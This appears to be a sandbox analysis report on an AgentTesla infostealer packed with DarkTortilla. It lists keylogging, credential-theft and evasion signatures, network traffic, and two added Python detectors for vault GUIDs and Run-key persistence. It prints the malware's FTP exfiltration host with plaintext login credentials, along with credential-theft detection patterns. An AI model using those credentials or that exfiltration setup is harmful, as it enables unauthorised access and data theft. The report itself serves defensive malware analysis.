Windows Analysis Report
QUOTATIONS#08670.exe

Overview

General Information

Sample name: QUOTATIONS#08670.exe
Analysis ID: 1524956
MD5: b88a9908634769557e2b6396f634c4ae
SHA1: 49ee7bf7463600dd8cd4b650ac0644c1a4ffb239
SHA256: fa7d9ffd715033a0b922b2b65f1fa6da05bb9feafe1432a9cc0863f7f640a3f9
Tags: exe, user-threatcat_ch

Detection

Detected: AgentTesla, DarkTortilla
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATIONS#08670.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • QUOTATIONS#08670.exe (PID: 8124 cmdline: "C:\Users\user\Desktop\QUOTATIONS#08670.exe" MD5: B88A9908634769557E2B6396F634C4AE)
  • newapp.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • newapp.exe (PID: 1656 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
  • newapp.exe (PID: 3820 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
    • newapp.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: B88A9908634769557E2B6396F634C4AE)
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: none
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "me@ercolina-usa.com", "Password": "uy,o#mZj8$lY"}
Yara matches in memory dumps (5 of 37 entries shown)

Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer), Author: Joe Security

Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_AgentTesla_1 (Yara detected AgentTesla), Author: Joe Security

Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer), Author: Joe Security

Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_AgentTesla_1 (Yara detected AgentTesla), Author: Joe Security

Source: 00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_DarkTortilla (Yara detected DarkTortilla Crypter), Author: Joe Security

Yara matches in unpacked PEs (5 of 125 entries shown)

Source: 9.2.newapp.exe.3cc54ba.4.unpack
Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer), Author: Joe Security

Source: 9.2.newapp.exe.3cc54ba.4.unpack
Rule: JoeSecurity_AgentTesla_1 (Yara detected AgentTesla), Author: Joe Security

Source: 9.2.newapp.exe.3cc54ba.4.unpack
Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (Detects executables referencing Windows vault credential objects. Observed in infostealers), Author: ditekSHen
Strings:
  • 0x33a0e: $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x33a80: $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33b0a: $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33b9c: $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33c06: $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33c78: $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33d0e: $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33d9e: $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Source: 9.2.newapp.exe.3cc54ba.4.unpack
Rule: MALWARE_Win_AgentTeslaV2 (AgenetTesla Type 2 Keylogger payload), Author: ditekSHen
Strings:
  • 0x30c22: $s2: GetPrivateProfileString
  • 0x302af: $s3: get_OSFullName
  • 0x319b2: $s5: remove_Key
  • 0x31b7b: $s5: remove_Key
  • 0x32abb: $s6: FtpWebRequest
  • 0x339f0: $s7: logins
  • 0x33f62: $s7: logins
  • 0x36cdb: $s7: logins
  • 0x36d25: $s7: logins
  • 0x387ee: $s7: logins
  • 0x378bf: $s9: 1.85 (Hash, version 2, native byte-order)

Source: 8.2.newapp.exe.4345322.3.unpack
Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer), Author: Joe Security
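The VaultSchemaGUID hit above keys on GUIDs that identify Windows Credential Manager (vault) schemas; a stealer that enumerates the vault has to reference them somewhere. The following is an added example in Python, not Joe Sandbox's code and not ditekSHen's YARA rule: it scans a dump for the eight GUIDs listed in the rule hit, in both ASCII and UTF-16LE (the encoding .NET uses for string literals in its #US heap, which an ASCII-only grep misses), and returns a verdict once several distinct GUIDs are present. The "three distinct GUIDs" threshold, the two encodings, and the sample blobs are assumptions of this example; the rule's real condition is not reproduced on this page.

```python
"""Scan a memory dump or unpacked PE for Windows Vault schema GUIDs.

Added example modelled on the INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID hit
above; it is not that YARA rule. The GUID list comes from the rule's string
hits on this page; the UTF-16LE search and the "3 distinct GUIDs" threshold
are assumptions made here.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Vault schema GUIDs exactly as they appear in the rule's string hits ($s1..$s8).
VAULT_SCHEMA_GUIDS = [
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5",
    "3CCD5499-87A8-4B10-A215-608888DD3B55",
    "154E23D0-C644-4E6F-8CE6-5069272F999F",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548",
]


def _patterns(guid: str, encodings: Iterable[str]):
    """Yield (encoding, compiled bytes regex) for a GUID in each requested encoding.

    .NET keeps string literals in the #US heap as UTF-16LE, so an ASCII-only
    search misses most of them; the UTF-16LE pattern interleaves a NUL after
    every character. IGNORECASE also catches GUIDs stored in lower case.
    """
    raw = guid.encode("ascii")
    for enc in encodings:
        if enc == "ascii":
            yield enc, re.compile(re.escape(raw), re.IGNORECASE)
        elif enc == "utf-16le":
            wide = b"".join(re.escape(bytes([b])) + b"\x00" for b in raw)
            yield enc, re.compile(wide, re.IGNORECASE)
        else:
            raise ValueError(f"unsupported encoding {enc!r}")


def find_guids(blob: bytes, encodings: Iterable[str] = ("ascii", "utf-16le")) -> Dict[str, List[Tuple[int, str]]]:
    """Map each GUID found in blob to its (offset, encoding) occurrences."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for guid in VAULT_SCHEMA_GUIDS:
        for enc, pat in _patterns(guid, encodings):
            for m in pat.finditer(blob):
                hits.setdefault(guid, []).append((m.start(), enc))
    return hits


def is_vault_reader(blob: bytes, min_distinct: int = 3) -> bool:
    """Heuristic verdict: enough distinct vault schema GUIDs to suggest credential harvesting.

    A single GUID can appear in benign software that talks to Credential Manager;
    the threshold (an assumption here, not the rule's condition) asks for several.
    """
    return len(find_guids(blob)) >= min_distinct


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed sample: a crude stand-in for an unpacked .NET payload whose
# user-string heap holds four vault GUIDs (one lower-cased) plus one ASCII copy.
SAMPLE_DOTNET_BLOB = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 40 + b"#US\x00"
    + _wide("logins") + b"\x00\x00"
    + _wide(VAULT_SCHEMA_GUIDS[0]) + b"\x00\x00"
    + _wide(VAULT_SCHEMA_GUIDS[1].lower()) + b"\x00\x00"
    + _wide(VAULT_SCHEMA_GUIDS[2]) + b"\x00\x00"
    + _wide(VAULT_SCHEMA_GUIDS[3]) + b"\x00\x00"
    + b"\x00" * 16
    + VAULT_SCHEMA_GUIDS[4].encode("ascii") + b"\x00"
)
# Constructed benign-looking blob: a single GUID, below the threshold.
BENIGN_BLOB = b"MZ" + b"\x00" * 100 + _wide("Credential Manager client") + _wide(VAULT_SCHEMA_GUIDS[0])

if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_DOTNET_BLOB), ("benign", BENIGN_BLOB)):
        hits = find_guids(blob)
        verdict = "vault reader" if is_vault_reader(blob) else "clean"
        print(f"{name}: {len(hits)} distinct GUIDs, verdict={verdict}")
        for guid, places in hits.items():
            print(f"  {guid}: " + ", ".join(f"0x{off:x} ({enc})" for off, enc in places))
```

Run it against a region such as 9.2.newapp.exe.3cc54ba.4.unpack read from disk and compare the offsets with the rule hit above; the point of the UTF-16LE pattern is that on the constructed sample an ASCII-only scan reports one GUID where the full scan reports five.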

                  System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QUOTATIONS#08670.exe, ProcessId: 8124, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp
No Suricata rule has matched
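The Sigma hit above is a Sysmon EventID 13 (registry SetValue) in which the dropper on the Desktop writes an HKCU Run value pointing at its own copy under AppData\Roaming\newapp. The following is an added example in Python, not Joe Sandbox's logic and not the Sigma rule itself, of the kind of check that hit represents, run over constructed Sysmon records: the first record reproduces the event from this report, the other two are made up here (a vendor updater that should not fire, and a downloaded installer that should). The autorun key list is a subset of what the Sigma rule covers, and the corroborating heuristics (target in a user-writable directory, writer launched from a staging directory and pointing the key at a differently named file) are assumptions of this example.

```python
"""Flag autorun-key persistence in Sysmon EventID 13 (RegistryEvent SetValue) records.

Added example mirroring the 'CurrentVersion Autorun Keys Modification' hit above;
it is not the Sigma rule. Key list is a subset; the scoring heuristics are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed Sysmon event message bodies in their "Key: Value" layout. The first
# is the event this report attributes to PID 8124; the other two are made up.
SAMPLE_EVENTS = [
    "EventID: 13\n"
    "EventType: SetValue\n"
    "Image: C:\\Users\\user\\Desktop\\QUOTATIONS#08670.exe\n"
    "ProcessId: 8124\n"
    "TargetObject: HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\newapp\n"
    "Details: C:\\Users\\user\\AppData\\Roaming\\newapp\\newapp.exe",
    "EventID: 13\n"
    "EventType: SetValue\n"
    "Image: C:\\Program Files\\ExampleVendor\\setup.exe\n"
    "ProcessId: 4120\n"
    "TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ExampleUpdater\n"
    "Details: \"C:\\Program Files\\ExampleVendor\\updater.exe\" --background",
    "EventID: 13\n"
    "EventType: SetValue\n"
    "Image: C:\\Users\\user\\Downloads\\installer.exe\n"
    "ProcessId: 5532\n"
    "TargetObject: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Finish\n"
    "Details: C:\\Users\\user\\AppData\\Local\\Temp\\finish.exe",
]

# Subset of the autorun locations the Sigma rule covers; captures the value name.
AUTORUN_KEY_RE = re.compile(
    r"\\Software\\(?:Wow6432Node\\)?Microsoft\\Windows\\CurrentVersion\\"
    r"(?:Run|RunOnce|RunOnceEx|RunServices|RunServicesOnce|Policies\\Explorer\\Run)\\([^\\]+)$",
    re.IGNORECASE,
)
# Directories an unprivileged user can write to: a payload staged here persists
# without ever touching Program Files or System32.
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.IGNORECASE)
# Typical landing spots for a freshly delivered file (mail attachment, browser download).
STAGING_RE = re.compile(r"\\(?:Desktop|Downloads|Temp)\\", re.IGNORECASE)


@dataclass
class Finding:
    process_id: str
    image: str
    value_name: str
    data_path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # "Something wrote an autorun key" alone is noisy; require corroboration.
        return len(self.reasons) >= 2


def parse_event(text: str) -> dict:
    """Turn the 'Key: Value' message body of a Sysmon event into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def first_path(details: str) -> str:
    """Extract the executable path from registry data that may be quoted and carry arguments.

    Unquoted paths containing spaces are cut at the first space; that is a known limitation.
    """
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', details)
    return (m.group(1) or m.group(2)) if m else details


def analyze(events: list) -> list:
    """Return one Finding per autorun-key SetValue event, with the reasons it accumulated."""
    findings = []
    for text in events:
        ev = parse_event(text)
        if ev.get("EventID") != "13" or ev.get("EventType") != "SetValue":
            continue
        key_match = AUTORUN_KEY_RE.search(ev.get("TargetObject", ""))
        if not key_match:
            continue
        data_path = first_path(ev.get("Details", ""))
        image = ev.get("Image", "")
        f = Finding(ev.get("ProcessId", "?"), image, key_match.group(1), data_path, ["autorun key written"])
        if USER_WRITABLE_RE.search(data_path):
            f.reasons.append("autorun target lives in a user-writable directory")
        if STAGING_RE.search(image) and ntpath.basename(image).lower() != ntpath.basename(data_path).lower():
            f.reasons.append("writer runs from a staging directory and points the key at a differently named file")
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{'SUSPICIOUS' if f.suspicious else 'info'}] pid={f.process_id} value={f.value_name} -> {f.data_path}")
        for r in f.reasons:
            print("    -", r)
```

On the three constructed records this flags PID 8124 (the report's event) and the downloaded installer, and leaves the vendor updater as informational. For hunting, the same check can be fed the Sysmon operational log exported as text; the regex deliberately keys on the path fragment rather than the hive prefix so that HKCU, HKEY_CURRENT_USER and HKU\<SID> renderings all match.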


                  AV Detection

Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, Malware Configuration Extractor: AgentTesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "me@ercolina-usa.com", "Password": "uy,o#mZj8$lY"}
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe, ReversingLabs: Detection: 23%
Source: QUOTATIONS#08670.exe, ReversingLabs: Detection: 23%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe, Joe Sandbox ML: detected
Source: QUOTATIONS#08670.exe, Joe Sandbox ML: detected
Source: QUOTATIONS#08670.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:62916 version: TLS 1.2
Source: QUOTATIONS#08670.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View, IP Address: 192.254.225.136
Source: Joe Sandbox View, IP Address: 104.26.12.205
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: unknown, DNS query: name: api.ipify.org
Source: unknown, FTP traffic detected: 192.254.225.136:21 -> 192.168.2.11:62918, server banner:
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 11 of 150 allowed.
  220-Local time is now 07:29. Server port: 21.
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: ftp.ercolina-usa.com
Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ercolina-usa.com
Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ftp.ercolina-usa.com
Source: newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://go.microsoft.c
Source: newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://go.microsoft.cinkI
Source: newapp.exe, 00000009.00000002.2605752686.0000000005EE4000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://purl.oen
Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://account.dyn.com/
Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
Source: QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/t
Source: unknown, Network traffic detected: HTTP traffic on port 62916 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 62916
Source: unknown, HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.11:62916 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, SKTzxzsJw.cs, .Net Code: kwpilQkK
Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, SKTzxzsJw.cs, .Net Code: kwpilQkK
Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, SKTzxzsJw.cs, .Net Code: kwpilQkK
Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, SKTzxzsJw.cs, .Net Code: kwpilQkK
Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, SKTzxzsJw.cs, .Net Code: kwpilQkK
Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\QUOTATIONS#08670.exe
Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe, Window created: window name: CLIPBRDWNDCLASS

                  System Summary

Source: the unpacked PE regions listed below, type: UNPACKEDPE. Every region matched both rules by ditekSHen: "Detects executables referencing Windows vault credential objects. Observed in infostealers" (INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID) and "AgenetTesla Type 2 Keylogger payload" (MALWARE_Win_AgentTeslaV2).
  • 0.2.QUOTATIONS#08670.exe: 37ebb82.1, 3828c62.4, 3865d32.3, 38dfeb2.0, 391cf70.5 (each in both .unpack and .raw.unpack form)
  • 4.2.QUOTATIONS#08670.exe: 400000.0 (.unpack)
  • 8.2.newapp.exe: 4250ff2.1, 428e0d2.2, 42cb1a2.0, 4345322.3, 43823e0.4 (each in both .unpack and .raw.unpack form)
  • 9.2.newapp.exe: 3bd118a.3, 3c0e26a.0, 3c4b33a.1, 3cc54ba.4, 3d02578.2 (each in both .unpack and .raw.unpack form)
Source: initial sample, Static PE information: Filename: QUOTATIONS#08670.exe
Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe, Code function: 0_2_07929CD0 CreateProcessAsUserW
Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe, Code functions (process 0): 0_2_008F86F9, 0_2_008FAC38, 0_2_008F79B8, 0_2_008FCD88, 0_2_06D232E8, 0_2_06D2B8A0, 0_2_06D232D9, 0_2_06D2D210, 0_2_07123538, 0_2_0712DD70, 0_2_0712DD6F, 0_2_071E2210, 0_2_071ECBA0, 0_2_071ECBD0, 0_2_079227C0, 0_2_07923FF8, 0_2_07924B2B, 0_2_0792A250, 0_2_079227BF, 0_2_079237D8, 0_2_07923FE8, 0_2_0792F2B0, 0_2_07927E28, 0_2_07928590, 0_2_0792E950, 0_2_0792003A, 0_2_07926827, 0_2_07926828, 0_2_07920040, 0_2_071E21E5
Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe, Code functions (process 4): 4_2_0146E010, 4_2_0146E7B5, 4_2_01464A68, 4_2_01463E50, 4_2_01464198, 4_2_0146ADA0, 4_2_06BC67B0, 4_2_06BC6BB0, 4_2_06BC5AE8, 4_2_06BC5ADA, 4_2_06BC1910, 4_2_06BE6638, 4_2_06BE34B0, 4_2_06BEB4DC, 4_2_06BE55E8, 4_2_06BE7DC8, 4_2_06BE76E8, 4_2_06BE2728, 4_2_06BE5D27, 4_2_06BEE3F0, 4_2_06BE0040
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe, Code function: 8_2_02F686F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F64B708_2_02F64B70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6AC388_2_02F6AC38
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F679B88_2_02F679B8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6CD888_2_02F6CD88
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622E1A88_2_0622E1A8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622E1988_2_0622E198
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622B81C8_2_0622B81C
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077D35388_2_077D3538
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077DDD708_2_077DDD70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077DDD6F8_2_077DDD6F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_078922108_2_07892210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0789CBA08_2_0789CBA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB32E88_2_07CB32E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CBCE848_2_07CBCE84
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB32E38_2_07CB32E3
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CBD2108_2_07CBD210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A5498_2_0810A549
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081049E28_2_081049E2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A2508_2_0810A250
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08108A508_2_08108A50
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081027C08_2_081027C0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08103FF88_2_08103FF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081000168_2_08100016
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081000408_2_08100040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081084488_2_08108448
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107CD08_2_08107CD0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107CE08_2_08107CE0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A2408_2_0810A240
